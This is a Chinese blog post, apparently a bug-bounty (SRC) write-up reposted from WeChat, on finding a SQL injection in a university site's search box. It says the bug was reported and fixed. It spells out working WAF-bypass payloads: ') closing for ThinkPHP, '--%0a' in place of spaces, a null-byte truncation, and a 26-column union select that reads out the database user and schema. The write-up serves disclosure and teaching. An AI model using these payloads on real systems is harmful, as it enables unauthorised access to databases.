记一次挖掘某SRC漏洞Bypass的思路

admin
admin
admin
101085
文章
87
评论
2022年3月24日02:47:46评论76 views字数 675阅读2分15秒阅读模式

记一次挖掘某SRC漏洞Bypass的思路

漏洞已提交某SRC 已修复 只是分享一下自己挖掘过程的思路来提供大家学习

打开网站,www.xxedu.cn 某大学国家网络安全学院  发现最上面有个输入框


记一次挖掘某SRC漏洞Bypass的思路


判断注入


记一次挖掘某SRC漏洞Bypass的思路


输入一个单引号


记一次挖掘某SRC漏洞Bypass的思路


页面报错 


难道就这样放弃吗  不


记一次挖掘某SRC漏洞Bypass的思路


冷静下抽根华子,输入两个试试 


记一次挖掘某SRC漏洞Bypass的思路


正常

判断列数

首先闭合,这里程序使用的是thinkphp,查询时候会用小括号包裹,所以首先用')闭合

1 keywords=1') %23


记一次挖掘某SRC漏洞Bypass的思路



order by x被拦截,用--%0a代替空格即可


记一次挖掘某SRC漏洞Bypass的思路


27报错代表只有26行


记一次挖掘某SRC漏洞Bypass的思路


联合注入

直接上union select会一直卡着没有任何返回


记一次挖掘某SRC漏洞Bypass的思路


把空格都改为--%0a,成功响应


记一次挖掘某SRC漏洞Bypass的思路


在select跟1,2,3...之间用两个--%0a负责会无响应

1 =1')‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1

6,17,18,19,20,21,22,23,24,25,26

但是发现还是响应错误,这里就猜测是错误跟拦截响应都相同


记一次挖掘某SRC漏洞Bypass的思路


联合注入Bypass

在1后面加上%00并url编码,原理是waf把空字节认为是结束导致了后面的语句可以绕过

1 :1%00')‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,

16,17,18,19,20,21,22,23,24,25,26

2 :%23


记一次挖掘某SRC漏洞Bypass的思路

得到回显点为4


记一次挖掘某SRC漏洞Bypass的思路


使用user--%0a()得到用户cse


记一次挖掘某SRC漏洞Bypass的思路


SCHEMA--%0a()得到数据库cse


记一次挖掘某SRC漏洞Bypass的思路


记一次挖掘某SRC漏洞Bypass的思路

本文始发于微信公众号(疯猫网络):记一次挖掘某SRC漏洞Bypass的思路

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月24日02:47:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次挖掘某SRC漏洞Bypass的思路http://cn-sec.com/archives/504826.html

发表评论

匿名网友 填写信息